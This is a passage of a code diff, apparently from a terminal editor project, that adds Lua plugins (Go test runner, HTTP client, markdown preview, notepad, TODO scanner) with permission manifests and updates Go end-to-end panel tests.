+
+local function cmd_run_all()
+  run_all(last_panel)
+end
+
+local function cmd_refresh()
+  discover_tests(last_panel)
+end
+
+local function cmd_run_current_file()
+  local file = editor.file_path()
+  if not file or not file:match("_test%.go$") then
+    ttt.log("warn", "Current file is not a Go test file")
+    return
+  end
+
+  -- Try to match the current file's directory against known packages.
+  -- Extract directory components and compare suffixes.
+  local dir = file:match("^(.+)/[^/]+$") or ""
+
+  for _, pkg in ipairs(packages) do
+    -- Check if the file's directory path ends with the package's import path suffix
+    local pkg_suffix = pkg.path:gsub("^[^/]+", "")  -- strip module prefix
+    if pkg_suffix ~= "" and dir:match(pkg_suffix:gsub("%-", "%%-") .. "$") then
+      run_package(pkg.path, last_panel)
+      return
+    end
+    -- Fallback: match by short package name
+    if dir:match("/" .. pkg.name .. "$") or dir == pkg.name then
+      run_package(pkg.path, last_panel)
+      return
+    end
+  end
+
+  ttt.log("warn", "Could not determine package for " .. file)
+end
+
+-- ---------------------------------------------------------------------------
+-- Registration
+-- ---------------------------------------------------------------------------
+
+ttt.register({
+  sidebar = {
+    title = "Tests",
+
+    actions = {
+      { label = "Run All Tests", command = "gotest.action.runAll" },
+      { label = "Refresh Test List", command = "gotest.action.refresh" },
+    },
+
+    on_action = function(command)
+      if command == "gotest.action.runAll" then
+        run_all(last_panel)
+      elseif command == "gotest.action.refresh" then
+        discover_tests(last_panel)
+      end
+    end,
+
+    render = function(panel)
+      last_panel = panel
+
+      -- Auto-discover on first render
+      if not initialized then
+        initialized = true
+        discover_tests(panel)
+      end
+
+      if loading then
+        panel:label({ text = "Discovering tests...", style = "muted" })
+        return
+      end
+
+      -- Summary label with badge
+      local passed, failed, not_run, running = compute_stats()
+      local total = passed + failed + not_run + running
+      local parts = {}
+      if passed > 0 then table.insert(parts, tostring(passed) .. " passed") end
+      if failed > 0 then table.insert(parts, tostring(failed) .. " failed") end
+      if not_run > 0 then table.insert(parts, tostring(not_run) .. " not run") end
+      if running > 0 then table.insert(parts, tostring(running) .. " running") end
+
+      local summary = "Tests: " .. (#parts > 0 and table.concat(parts, ", ") or "none found")
+      panel:label({ text = summary, style = "muted", badge = tostring(total), padding_left = 1, padding_right = 1 })
+
+      if #packages == 0 then
+        panel:label({ text = "No test packages found", style = "muted", padding_left = 1 })
+        panel:label({ text = "Press r to refresh", style = "muted", padding_left = 1 })
+        return
+      end
+
+      -- Test tree
+      panel:box({
+        padding_left = 1,
+        render = function(bp)
+          bp:tree({
+            items = build_tree_items(),
+            indent = 2,
+            on_command = function(command, node)
+              local pkg_path, test_name = parse_key(node.id)
+              if command == "activate" then
+                if pkg_path and test_name then
+                  local status = test_status[node.id]
+                  if status == "fail" then
+                    navigate_to_test(node.id)
+                  else
+                    run_test(pkg_path, test_name, panel)
+                  end
+                else
+                  run_package(node.id, panel)
+                end
+              elseif command == "run" then
+                if pkg_path and test_name then
+                  run_test(pkg_path, test_name, panel)
+                else
+                  run_package(node.id, panel)
+                end
+              elseif command == "run_all" then
+                if pkg_path then
+                  run_package(pkg_path, panel)
+                else
+                  run_package(node.id, panel)
+                end
+              end
+            end,
+            node_menu = {
+              { label = "▶ Run", command = "run" },
+              { label = "▶ Run All in Package", command = "run_all" },
+            },
+            key_commands = {
+              f = "run",
+              a = "run_all",
+            },
+          })
+        end,
+      })
+    end,
+
+    on_event = function(event)
+      if event.type == "key" then
+        if event.key == "r" and event.mod == nil then
+          discover_tests(last_panel)
+        end
+      end
+    end,
+  },
+
+  commands = {
+    { id = "gotest.runAll", title = "Go Tests: Run All", handler = cmd_run_all },
+    { id = "gotest.runCurrentFile", title = "Go Tests: Run Current File", handler = cmd_run_current_file },
+    { id = "gotest.refresh", title = "Go Tests: Refresh", handler = cmd_refresh },
+  },
+
+  keybindings = {
+    { key = "ctrl+k t", command = "gotest.runAll" },
+  },
+})

--- a/plugins/go-test-runner/plugin.ttt.json
+++ b/plugins/go-test-runner/plugin.ttt.json
@@ -1,0 +1,15 @@
+{
+  "name": "go-test-runner",
+  "description": "Run Go tests and view results in a sidebar panel",
+  "version": "0.1.0",
+  "author": "eugenioenko",
+  "entry": "plugin.lua",
+  "permissions": {
+    "panel.sidebar": true,
+    "commands": true,
+    "keybindings": true,
+    "system.exec": ["go"],
+    "editor.read": true,
+    "editor.write": true
+  }
+}

--- a/plugins/http-client/plugin.lua
+++ b/plugins/http-client/plugin.lua
@@ -1,0 +1,171 @@
+local ttt = require("ttt")
+local net = require("ttt.net")
+local editor = require("ttt.editor")
+
+-- State
+local url = ""
+local method = "GET"
+local body = ""
+local response_lines = {}
+local response_status = nil
+local loading = false
+
+local function split_lines(text)
+  local lines = {}
+  for line in (text .. "\n"):gmatch("(.-)\n") do
+    table.insert(lines, line)
+  end
+  return lines
+end
+
+local function do_request(panel)
+  if url == "" then
+    ttt.log("warn", "URL is empty")
+    return
+  end
+
+  loading = true
+  response_lines = {}
+  response_status = nil
+  if panel then panel:redraw() end
+
+  local target = url
+  if not target:match("^https?://") then
+    target = "http://" .. target
+  end
+
+  ttt.log("info", method .. " " .. target)
+
+  local function handle_response(resp)
+    loading = false
+    if resp.error then
+      response_status = "error"
+      response_lines = { "Error: " .. resp.error }
+    else
+      response_status = tostring(resp.status)
+      response_lines = split_lines(resp.body)
+    end
+    ttt.log("info", "Response: " .. (response_status or "?"))
+    if panel then panel:redraw() end
+  end
+
+  if method == "POST" then
+    net.post_async(target, {
+      headers = { ["Content-Type"] = "application/json" },
+      body = body,
+    }, handle_response)
+  else
+    net.get_async(target, handle_response)
+  end
+end
+
+local last_panel = nil
+
+local function open_client()
+  ttt.open_drawer({
+    width = 50,
+    min_width = 30,
+    render = function(panel)
+      last_panel = panel
+
+      panel:label({ text = "HTTP Client", style = "bold", padding_left = 1 })
+
+      panel:vstack({
+        gap = 0,
+        render = function(p)
+          p:label({ text = "Method", style = "muted", padding_left = 1 })
+          p:list({
+            items = {
+              { id = "GET", label = "GET", icon = method == "GET" and "●" or "○" },
+              { id = "POST", label = "POST", icon = method == "POST" and "●" or "○" },
+            },
+            on_select = function(node)
+              method = node.id
+              panel:redraw()
+            end,
+          })
+        end,
+      })
+
+      panel:label({ text = "URL", style = "muted", padding_left = 1, margin_top = 1 })
+      panel:input({
+        placeholder = "https://api.example.com/data",
+        on_change = function(text)
+          url = text
+        end,
+        on_submit = function(text)
+          url = text
+          do_request(panel)
+        end,
+      })
+
+      if method == "POST" then
+        panel:label({ text = "Body (JSON)", style = "muted", padding_left = 1, margin_top = 1 })
+        panel:input({
+          placeholder = '{"key": "value"}',
+          on_change = function(text)
+            body = text
+          end,
+        })
+      end
+
+      panel:vstack({
+        render = function(p)
+          p:button({ label = "&Send", on_click = function()
+            do_request(panel)
+          end })
+        end,
+      })
+
+      if loading then
+        panel:label({ text = "Loading...", style = "muted", padding_left = 1, margin_top = 1 })
+      elseif response_status then
+        local status_style = "success"
+        if response_status == "error" or (tonumber(response_status) and tonumber(response_status) >= 400) then
+          status_style = "danger"
+        elseif tonumber(response_status) and tonumber(response_status) >= 300 then
+          status_style = "warning"
+        end
+        panel:label({
+          text = "Response",
+          badge = response_status,
+          padding_left = 1,
+          margin_top = 1,
+        })
+
+        panel:box({
+          border = true,
+          render = function(bp)
+            if #response_lines == 0 then
+              bp:label({ text = "(empty response)", style = "muted" })
+            else
+              for _, line in ipairs(response_lines) do
+                bp:label(line)
+              end
+            end
+          end,
+        })
+
+        panel:vstack({
+          render = function(p)
+            p:button({ label = "&Insert to editor", on_click = function()
+              local text = table.concat(response_lines, "\n")
+              editor.insert(text)
+              ttt.log("info", "Inserted response into editor")
+              ttt.close_drawer()
+            end })
+          end,
+        })
+      end
+    end,
+  })
+end
+
+ttt.register({
+  commands = {
+    { id = "httpClient.open", title = "HTTP Client: Open", handler = open_client },
+  },
+  keybindings = {
+    { key = "ctrl+k u", command = "httpClient.open" },
+  },
+})

--- a/plugins/http-client/plugin.ttt.json
+++ b/plugins/http-client/plugin.ttt.json
@@ -1,0 +1,13 @@
+{
+  "name": "http-client",
+  "version": "0.1.0",
+  "description": "Simple HTTP client for testing APIs",
+  "entry": "plugin.lua",
+  "permissions": {
+    "panel.drawer": true,
+    "commands": true,
+    "keybindings": true,
+    "network.http": true,
+    "editor.write": true
+  }
+}

--- a/plugins/markdown-preview/plugin.lua
+++ b/plugins/markdown-preview/plugin.lua
@@ -1,0 +1,62 @@
+local ttt = require("ttt")
+local editor = require("ttt.editor")
+
+local function show_preview()
+  local path = editor.file_path()
+  if not path or not path:match("%.md$") then
+    ttt.log("warn", "Current file is not a markdown file")
+    return
+  end
+
+  local text = editor.buffer_text()
+  if not text or text == "" then
+    ttt.log("warn", "Buffer is empty")
+    return
+  end
+
+  local lines = ttt.markdown(text)
+  local name = editor.file_name()
+
+  ttt.open_tab({
+    title = "Preview: " .. name,
+    render = function(p)
+      p:scrollview({
+        render = function(sp)
+          for _, line in ipairs(lines) do
+            local parts = {}
+            for _, span in ipairs(line) do
+              if span.text ~= "" then
+                table.insert(parts, span)
+              end
+            end
+            if #parts == 0 then
+              sp:label("")
+            elseif #parts == 1 then
+              sp:label({ text = parts[1].text, style = parts[1].style, padding_left = 1 })
+            else
+              local full = ""
+              local style = "default"
+              for _, span in ipairs(parts) do
+                full = full .. span.text
+                if style == "default" and span.style ~= "default" then
+                  style = span.style
+                end
+              end
+              sp:label({ text = full, style = style, padding_left = 1 })
+            end
+          end
+        end,
+      })
+    end,
+  })
+end
+
+ttt.register({
+  commands = {
+    {
+      id = "markdown.preview",
+      title = "Markdown: Preview",
+      handler = show_preview,
+    },
+  },
+})

--- a/plugins/markdown-preview/plugin.ttt.json
+++ b/plugins/markdown-preview/plugin.ttt.json
@@ -1,0 +1,12 @@
+{
+  "name": "markdown-preview",
+  "description": "Preview markdown files with styled rendering",
+  "version": "0.1.0",
+  "author": "eugenioenko",
+  "entry": "plugin.lua",
+  "permissions": {
+    "panel.editor": true,
+    "commands": true,
+    "editor.read": true
+  }
+}

--- a/plugins/notepad/plugin.lua
+++ b/plugins/notepad/plugin.lua
@@ -1,0 +1,275 @@
+local ttt = require("ttt")
+local fs = require("ttt.fs")
+local sys = require("ttt.system")
+
+-- Minimal JSON encoder/decoder for our notes data format.
+-- Notes are stored as: [{"id":"1","text":"...","timestamp":"..."},...]
+
+local function json_escape(s)
+  s = s:gsub('\\', '\\\\')
+  s = s:gsub('"', '\\"')
+  s = s:gsub('\n', '\\n')
+  s = s:gsub('\r', '\\r')
+  s = s:gsub('\t', '\\t')
+  return s
+end
+
+local function json_encode(notes_list)
+  local parts = {}
+  for _, note in ipairs(notes_list) do
+    local entry = string.format(
+      '{"id":"%s","text":"%s","timestamp":"%s"}',
+      json_escape(note.id),
+      json_escape(note.text),
+      json_escape(note.timestamp)
+    )
+    table.insert(parts, entry)
+  end
+  return "[\n  " .. table.concat(parts, ",\n  ") .. "\n]"
+end
+
+local function json_decode(str)
+  local result = {}
+  if not str or #str == 0 then return result end
+
+  local i = 1
+  local len = #str
+
+  local function skip_ws()
+    while i <= len and str:sub(i, i):match("%s") do i = i + 1 end
+  end
+
+  local function parse_string()
+    if i > len or str:sub(i, i) ~= '"' then return nil end
+    i = i + 1
+    local parts = {}
+    while i <= len do
+      local c = str:sub(i, i)
+      if c == '\\' then
+        i = i + 1
+        local nc = str:sub(i, i)
+        if nc == 'n' then table.insert(parts, '\n')
+        elseif nc == 'r' then table.insert(parts, '\r')
+        elseif nc == 't' then table.insert(parts, '\t')
+        elseif nc == '"' then table.insert(parts, '"')
+        elseif nc == '\\' then table.insert(parts, '\\')
+        else table.insert(parts, nc) end
+        i = i + 1
+      elseif c == '"' then
+        i = i + 1
+        return table.concat(parts)
+      else
+        table.insert(parts, c)
+        i = i + 1
+      end
+    end
+    return nil
+  end
+
+  skip_ws()
+  if i > len or str:sub(i, i) ~= '[' then return result end
+  i = i + 1
+
+  while i <= len do
+    skip_ws()
+    if str:sub(i, i) == ']' then break end
+    if str:sub(i, i) == ',' then i = i + 1 end
+    skip_ws()
+
+    if str:sub(i, i) == '{' then
+      i = i + 1
+      local note = {}
+      while i <= len do
+        skip_ws()
+        if str:sub(i, i) == '}' then i = i + 1; break end
+        if str:sub(i, i) == ',' then i = i + 1 end
+        skip_ws()
+        local key = parse_string()
+        skip_ws()
+        if i <= len and str:sub(i, i) == ':' then i = i + 1 end
+        skip_ws()
+        local value = parse_string()
+        if key and value then
+          note[key] = value
+        end
+      end
+      if note.text then
+        table.insert(result, note)
+      end
+    else
+      break
+    end
+  end
+
+  return result
+end
+
+-- State
+local notes = {}
+local next_id = 1
+local notes_file = nil
+local last_panel = nil
+
+-- Get current timestamp via the date command
+local function get_timestamp()
+  local result = sys.exec("date", {"+%Y-%m-%d %H:%M:%S"})
+  if result.exit_code == 0 then
+    return result.stdout:match("^(.-)%s*$") or ""
+  end
+  return "unknown"
+end
+
+-- Load notes from the JSON file
+local function load_notes()
+  if not notes_file then return end
+  if not fs.exists(notes_file) then
+    notes = {}
+    return
+  end
+  local content, err = fs.read(notes_file)
+  if not content then
+    ttt.log("error", "Failed to read notes: " .. (err or "unknown error"))
+    return
+  end
+  notes = json_decode(content)
+  -- Set next_id higher than any existing id
+  for _, note in ipairs(notes) do
+    local num = tonumber(note.id) or 0
+    if num >= next_id then
+      next_id = num + 1
+    end
+  end
+end
+
+-- Save notes to the JSON file
+local function save_notes()
+  if not notes_file then return end
+  local content = json_encode(notes)
+  local err = fs.write(notes_file, content)
+  if err then
+    ttt.log("error", "Failed to save notes: " .. err)
+  end
+end
+
+-- Add a new note (inserted at the beginning for newest-first order)
+local function add_note(text, panel)
+  local timestamp = get_timestamp()
+  table.insert(notes, 1, {
+    id = tostring(next_id),
+    text = text,
+    timestamp = timestamp,
+  })
+  next_id = next_id + 1
+  save_notes()
+  ttt.log("Note added")
+  if panel then panel:redraw() end
+end
+
+-- Delete a note by its id
+local function delete_note(id, panel)
+  for i, note in ipairs(notes) do
+    if note.id == id then
+      table.remove(notes, i)
+      break
+    end
+  end
+  save_notes()
+  ttt.log("Note deleted")
+  if panel then panel:redraw() end
+end
+
+-- Clear all notes (with confirmation)
+local function clear_all()
+  if #notes == 0 then
+    ttt.log("warn", "No notes to clear")
+    return
+  end
+  ttt.confirm("Clear all " .. #notes .. " notes?", function()
+    notes = {}
+    save_notes()
+    ttt.log("All notes cleared")
+    if last_panel then last_panel:redraw() end
+  end)
+end
+
+-- Build list items from notes for the list widget
+local function note_items()
+  local items = {}
+  for _, note in ipairs(notes) do
+    local ts = note.timestamp or ""
+    local short = ts:match("^(%d+-%d+-%d+)") or ts
+    table.insert(items, {
+      id = note.id,
+      label = short .. "  " .. note.text,
+    })
+  end
+  return items
+end
+
+local function init()
+  if notes_file then return end
+  local result = sys.exec("pwd", {})
+  local root = "."
+  if result.exit_code == 0 then
+    root = result.stdout:match("^(.-)%s*$") or "."
+  end
+  notes_file = root .. "/.ttt-notepad.json"
+  load_notes()
+  ttt.log("Notepad loaded (" .. #notes .. " notes)")
+end
+
+-- Register the plugin
+ttt.register({
+  bottom = {
+    title = "Notepad",
+    render = function(panel)
+      last_panel = panel
+      init()
+
+      panel:hstack({
+        height = 1,
+        render = function(h)
+          h:input({
+            placeholder = "Type a note and press Enter...",
+            prefix = "> ",
+            clear_on_submit = true,
+            on_submit = function(text)
+              if #text > 0 then
+                add_note(text, panel)
+              end
+            end,
+          })
+          h:label({ text = tostring(#notes) .. " notes", style = "muted", width = 10 })
+        end,
+      })
+
+      panel:divider()
+
+      if #notes == 0 then
+        panel:label({ text = "No notes yet. Type above and press Enter.", style = "muted", padding_left = 1 })
+      else
+        panel:list({
+          items = note_items(),
+          on_command = function(command, node)
+            if command == "delete" then
+              ttt.confirm("Delete this note?", function()
+                delete_note(node.id, panel)
+              end)
+            end
+          end,
+          node_menu = {
+            { label = "Delete", command = "delete" },
+          },
+        })
+      end
+    end,
+  },
+
+  commands = {
+    {
+      id = "notepad.clearAll",
+      title = "Notepad: Clear All Notes",
+      handler = clear_all,
+    },
+  },
+})

--- a/plugins/notepad/plugin.ttt.json
+++ b/plugins/notepad/plugin.ttt.json
@@ -1,0 +1,14 @@
+{
+  "name": "notepad",
+  "description": "Persistent scratchpad for jotting down notes per workspace",
+  "version": "0.1.0",
+  "author": "eugenioenko",
+  "entry": "plugin.lua",
+  "permissions": {
+    "panel.bottom": true,
+    "fs.read": true,
+    "fs.write": true,
+    "commands": true,
+    "system.exec": ["date", "pwd"]
+  }
+}

--- a/plugins/todo-scanner/plugin.lua
+++ b/plugins/todo-scanner/plugin.lua
@@ -1,0 +1,254 @@
+local ttt = require("ttt")
+local sys = require("ttt.system")
+
+-- State
+local results = {}       -- grouped results: { {file=..., items={...}}, ... }
+local total_count = 0
+local scanning = false
+local initialized = false
+local rg_missing = false
+local last_panel = nil
+
+-- Icons for comment types
+local icons = {
+  TODO  = "\xe2\x98\x90",  -- ☐
+  FIXME = "\xe2\x9a\xa0",  -- ⚠
+  HACK  = "\xe2\x9a\xa1",  -- ⚡
+  NOTE  = "\xe2\x84\xb9",  -- ℹ
+}
+
+-- Detect which comment type a matched line contains
+local function detect_type(text)
+  -- Check for the keyword nearest to the start of the match
+  local best_type = "TODO"
+  local best_pos = #text + 1
+  for _, kw in ipairs({"TODO", "FIXME", "HACK", "NOTE"}) do
+    local pos = text:find(kw)
+    if pos and pos < best_pos then
+      best_pos = pos
+      best_type = kw
+    end
+  end
+  return best_type
+end
+
+-- Extract the comment text after the keyword (e.g. "TODO: fix this" -> "fix this")
+local function extract_text(line, keyword)
+  local pattern = keyword .. "[:%s]*(.*)"
+  local match = line:match(pattern)
+  if match then
+    -- Trim trailing whitespace
+    return match:gsub("%s+$", "")
+  end
+  return line:gsub("%s+$", "")
+end
+
+-- Parse ripgrep output and group by file
+local function parse_results(stdout)
+  local files = {}       -- ordered list of file paths
+  local file_map = {}    -- file_path -> { items = { ... } }
+  local count = 0
+
+  for line in stdout:gmatch("[^\n]+") do
+    -- ripgrep format: file:line:column:matched text
+    local file, line_num, col, text = line:match("^(.-):(%-?%d+):(%-?%d+):(.*)$")
+    if file and line_num and text then
+      local comment_type = detect_type(text)
+      local display_text = extract_text(text, comment_type)
+
+      -- Trim leading whitespace from display text
+      display_text = display_text:gsub("^%s+", "")
+      if display_text == "" then
+        display_text = comment_type
+      end
+
+      -- Strip leading ./ from file paths
+      if file:sub(1, 2) == "./" then
+        file = file:sub(3)
+      end
+
+      if not file_map[file] then
+        file_map[file] = { items = {} }
+        table.insert(files, file)
+      end
+
+      table.insert(file_map[file].items, {
+        line = tonumber(line_num),
+        col = tonumber(col),
+        text = display_text,
+        type = comment_type,
+        file = file,
+      })
+      count = count + 1
+    end
+  end
+
+  -- Build grouped results
+  local grouped = {}
+  for _, file_path in ipairs(files) do
+    table.insert(grouped, {
+      file = file_path,
+      items = file_map[file_path].items,
+    })
+  end
+
+  return grouped, count
+end
+
+-- Build tree items from grouped results
+local function build_tree_items()
+  local tree = {}
+
+  for _, group in ipairs(results) do
+    local children = {}
+    for i, item in ipairs(group.items) do
+      local icon = icons[item.type] or icons.TODO
+      table.insert(children, {
+        id = item.file .. ":" .. tostring(item.line),
+        label = item.text,
+        icon = icon,
+        badge = ":" .. tostring(item.line),
+      })
+    end
+
+    -- Use file path as the parent node
+    local file_label = group.file
+    table.insert(tree, {
+      id = "file:" .. group.file,
+      label = file_label,
+      expandable = true,
+      expanded = true,
+      badge = tostring(#group.items),
+      children = children,
+    })
+  end
+
+  return tree
+end
+
+-- Run the scan
+local function scan_workspace(panel)
+  if scanning then
+    return
+  end
+  scanning = true
+  rg_missing = false
+  ttt.log("Scanning workspace for TODOs...")
+
+  sys.exec_async("rg", {
+    "--no-heading",
+    "--line-number",
+    "--column",
+    "-e", "TODO|FIXME|HACK|NOTE",
+    ".",
+  }, function(result)
+    scanning = false
+
+    if result.exit_code == -1 then
+      -- exec error: rg not found
+      rg_missing = true
+      results = {}
+      total_count = 0
+      ttt.log("warn", "ripgrep (rg) is not installed. Install it to use TODO scanning.")
+    elseif result.exit_code == 0 then
+      results, total_count = parse_results(result.stdout)
+      ttt.log("Found " .. tostring(total_count) .. " TODOs in " .. tostring(#results) .. " files")
+    elseif result.exit_code == 1 then
+      -- rg returns 1 when no matches found
+      results = {}
+      total_count = 0
+      ttt.log("No TODOs found in workspace")
+    else
+      results = {}
+      total_count = 0
+      ttt.log("warn", "Scan failed: " .. result.stderr)
+    end
+
+    if panel then panel:redraw() end
+  end)
+end
+
+-- Navigate to a file and line (from tree node id "file:line")
+local function navigate_to(node_id)
+  local file, line = node_id:match("^(.+):(%d+)$")
+  if file and line then
+    -- TODO: use editor.open_file(file, line) once the API supports it
+    ttt.log("Navigate to " .. file .. " line " .. line)
+  end
+end
+
+-- Command handler for palette
+local function cmd_scan()
+  scan_workspace(last_panel)
+end
+
+-- Registration
+ttt.register({
+  bottom = {
+    title = "TODOs",
+
+    render = function(panel)
+      last_panel = panel
+
+      -- Scan on first open
+      if not initialized then
+        initialized = true
+        scan_workspace(panel)
+      end
+
+      -- Show scanning state
+      if scanning then
+        panel:label({ text = "Scanning...", style = "muted" })
+        return
+      end
+
+      -- Handle rg not installed
+      if rg_missing then
+        panel:label({ text = "ripgrep (rg) is not installed", style = "danger", padding_left = 1 })
+        panel:label({ text = "Install ripgrep to scan for TODOs:", style = "muted", padding_left = 1 })
+        panel:label({ text = "  https://github.com/BurntSushi/ripgrep", style = "muted", padding_left = 1 })
+        panel:label({ text = "", padding_left = 1 })
+        panel:label({ text = "On Ubuntu/Debian: sudo apt install ripgrep", style = "muted", padding_left = 1 })
+        panel:label({ text = "On macOS: brew install ripgrep", style = "muted", padding_left = 1 })
+        panel:label({ text = "On Arch: sudo pacman -S ripgrep", style = "muted", padding_left = 1 })
+        return
+      end
+
+      -- Header with count
+      if total_count > 0 then
+        panel:label({ text = "Results", badge = tostring(total_count), style = "muted", padding_left = 1 })
+      end
+
+      -- No results
+      if total_count == 0 and not scanning then
+        panel:label({ text = "No TODOs found", style = "muted", padding_left = 1 })
+        panel:label({ text = "Press r to refresh", style = "muted", padding_left = 1 })
+        return
+      end
+
+      -- Results tree
+      panel:tree({
+        items = build_tree_items(),
+        indent = 2,
+        on_select = function(node)
+          -- Only navigate for leaf nodes (actual TODO items, not file groups)
+          if node.id and not node.id:match("^file:") then
+            navigate_to(node.id)
+          end
+        end,
+      })
+    end,
+
+    on_event = function(event)
+      if event.type == "key" then
+        if event.key == "r" and event.mod == nil then
+          scan_workspace(last_panel)
+        end
+      end
+    end,
+  },
+
+  commands = {
+    { id = "todos.scan", title = "TODOs: Scan Workspace", handler = cmd_scan },
+  },
+})

--- a/plugins/todo-scanner/plugin.ttt.json
+++ b/plugins/todo-scanner/plugin.ttt.json
@@ -1,0 +1,12 @@
+{
+  "name": "todo-scanner",
+  "description": "Scans workspace for TODO, FIXME, HACK, and NOTE comments",
+  "version": "0.1.0",
+  "author": "eugenioenko",
+  "entry": "plugin.lua",
+  "permissions": {
+    "panel.bottom": true,
+    "commands": true,
+    "system.exec": ["rg"]
+  }
+}

--- a/tests/e2e/panel_test.go
+++ b/tests/e2e/panel_test.go
@@ -20,12 +20,12 @@ func TestBottomPanelTabClick(t *testing.T) {
 	panelY := h.app.BottomPanel.GetRect().Y
 	panelX := h.app.BottomPanel.GetRect().X
 
-	h.click(panelX+39, panelY)
+	h.click(panelX+50, panelY)
 	if h.app.BottomPanel.ActivePanel != "test-b" {
 		t.Errorf("expected active panel 'test-b' after click, got %q", h.app.BottomPanel.ActivePanel)
 	}
 
-	h.click(panelX+32, panelY)
+	h.click(panelX+43, panelY)
 	if h.app.BottomPanel.ActivePanel != "test-a" {
 		t.Errorf("expected active panel 'test-a' after click, got %q", h.app.BottomPanel.ActivePanel)
 	}
@@ -40,13 +40,13 @@ func TestTabbedPanelRemovePanel(t *testing.T) {
 	h.app.BottomPanel.AddPanel("p3", "Three", newEmptyWidget())
 	h.app.BottomPanel.SetActivePanel("p2")
 
-	if h.app.BottomPanel.PanelCount() != 6 {
-		t.Fatalf("expected 6 panels, got %d", h.app.BottomPanel.PanelCount())
+	if h.app.BottomPanel.PanelCount() != 7 {
+		t.Fatalf("expected 7 panels, got %d", h.app.BottomPanel.PanelCount())
 	}
 
 	h.app.BottomPanel.RemovePanel("p2")
-	if h.app.BottomPanel.PanelCount() != 5 {
-		t.Fatalf("expected 5 panels, got %d", h.app.BottomPanel.PanelCount())
+	if h.app.BottomPanel.PanelCount() != 6 {
+		t.Fatalf("expected 6 panels, got %d", h.app.BottomPanel.PanelCount())
 	}
 	if h.app.BottomPanel.ActivePanel == "p2" {
 		t.Error("active panel should have changed after removing it")
@@ -54,8 +54,8 @@ func TestTabbedPanelRemovePanel(t *testing.T) {
 
 	h.app.BottomPanel.RemovePanel("p1")
 	h.app.BottomPanel.RemovePanel("p3")
-	if h.app.BottomPanel.PanelCount() != 3 {
-		t.Fatalf("expected 3 panels (terminal+problems+references), got %d", h.app.BottomPanel.PanelCount())
+	if h.app.BottomPanel.PanelCount() != 4 {
+		t.Fatalf("expected 4 panels (terminal+problems+references+output), got %d", h.app.BottomPanel.PanelCount())
 	}
 }
 

--- a/tests/e2e/plugin_panel_test.go
+++ b/tests/e2e/plugin_panel_test.go
@@ -1,0 +1,157 @@
+package e2e
+
+import (
+	"os"
+	"path/filepath"
+	"strings"
+	"testing"
+
+	"github.com/eugenioenko/ttt/internal/plugin"
+	"github.com/eugenioenko/ttt/internal/ui"
+	"github.com/gdamore/tcell/v2"
+)
+
+func TestPluginPanelSidebarEvents(t *testing.T) {
+	h := newTestHarness(t, 80, 40)
+	defer h.stop()
+
+	// Create a plugin directory with a manifest and Lua file
+	pluginDir := filepath.Join(h.dir, "test-plugin")
+	os.MkdirAll(pluginDir, 0755)
+	os.WriteFile(filepath.Join(pluginDir, "plugin.ttt.json"), []byte(`{
+		"name": "test-panel",
+		"description": "test",
+		"version": "0.1.0",
+		"entry": "init.lua",
+		"permissions": { "panel.sidebar": true }
+	}`), 0644)
+	os.WriteFile(filepath.Join(pluginDir, "init.lua"), []byte(`
+		local ttt = require("ttt")
+		ttt.register({
+			sidebar = {
+				title = "Test",
+				render = function(panel)
+					panel:list({
+						items = {
+							{ id = "a", label = "Alpha" },
+							{ id = "b", label = "Beta" },
+							{ id = "c", label = "Gamma" },
+							{ id = "d", label = "Delta" },
+							{ id = "e", label = "Epsilon" },
+						},
+					})
+				end,
+			},
+		})
+	`), 0644)
+
+	manifest, err := plugin.LoadManifest(pluginDir)
+	if err != nil {
+		t.Fatalf("load manifest: %v", err)
+	}
+
+	p := &plugin.Plugin{
+		Name:     manifest.Name,
+		Dir:      pluginDir,
+		Manifest: manifest,
+		Granted:  manifest.Permissions,
+	}
+	if err := p.Init(); err != nil {
+		t.Fatalf("init plugin: %v", err)
+	}
+	defer p.Destroy()
+
+	if p.SidebarTitle == "" {
+		t.Fatal("expected sidebar title to be set")
+	}
+	if p.RenderFunc == nil {
+		t.Fatal("expected render func to be set")
+	}
+
+	pw := plugin.NewPluginPanelWidget(p, p.RenderFunc, p.EventFunc)
+	adapter := ui.NewWidgetAdapter(pw)
+
+	h.app.Sidebar.AddPanel("plugin.test-panel", "Test", adapter)
+	h.app.Sidebar.SetActivePanel("plugin.test-panel")
+	h.app.ShowSidebar()
+	h.redraw()
+
+	// Verify the panel rendered the list items
+	screen := h.screenText()
+	if !strings.Contains(screen, "Alpha") {
+		t.Fatal("expected 'Alpha' to be visible in sidebar")
+	}
+	if !strings.Contains(screen, "Epsilon") {
+		t.Log("Epsilon may be scrolled off, that's ok")
+	}
+
+	// Get sidebar content area
+	sidebarRect := h.app.Sidebar.GetRect()
+	t.Logf("sidebar rect: %+v", sidebarRect)
+
+	// Find where "Alpha" is rendered
+	alphaY := -1
+	for y := 0; y < 40; y++ {
+		row := h.screenRow(y)
+		if strings.Contains(row, "Alpha") {
+			alphaY = y
+			break
+		}
+	}
+	if alphaY < 0 {
+		t.Fatal("could not find Alpha row on screen")
+	}
+	t.Logf("Alpha is at row %d", alphaY)
+
+	// Click on Alpha - this should be consumed by the tree widget
+	down := tcell.NewEventMouse(sidebarRect.X+5, alphaY, tcell.Button1, tcell.ModNone)
+	result := h.app.Root.HandleEvent(down)
+	t.Logf("click on Alpha result: %d", result)
+
+	up := tcell.NewEventMouse(sidebarRect.X+5, alphaY, tcell.ButtonNone, tcell.ModNone)
+	h.app.Root.HandleEvent(up)
+	h.redraw()
+
+	// Click on Beta
+	betaY := alphaY + 1
+	down2 := tcell.NewEventMouse(sidebarRect.X+5, betaY, tcell.Button1, tcell.ModNone)
+	result2 := h.app.Root.HandleEvent(down2)
+	t.Logf("click on Beta result: %d", result2)
+
+	up2 := tcell.NewEventMouse(sidebarRect.X+5, betaY, tcell.ButtonNone, tcell.ModNone)
+	h.app.Root.HandleEvent(up2)
+	h.redraw()
+
+	// Wheel scroll
+	wheelDown := tcell.NewEventMouse(sidebarRect.X+5, alphaY, tcell.WheelDown, tcell.ModNone)
+	wheelResult := h.app.Root.HandleEvent(wheelDown)
+	t.Logf("wheel down result: %d", wheelResult)
+	h.redraw()
+
+	// Now set focus to sidebar and try keyboard
+	h.app.Root.SetFocus(h.app.Sidebar)
+
+	// Arrow down should work
+	downKey := tcell.NewEventKey(tcell.KeyDown, 0, tcell.ModNone)
+	keyResult := h.app.Root.HandleEvent(downKey)
+	t.Logf("arrow down result: %d", keyResult)
+	h.redraw()
+
+	// Tab should cycle focus
+	tabKey := tcell.NewEventKey(tcell.KeyTab, 0, tcell.ModNone)
+	tabResult := h.app.Root.HandleEvent(tabKey)
+	t.Logf("tab result: %d", tabResult)
+	h.redraw()
+
+	// If we got here without panics, basic event routing works
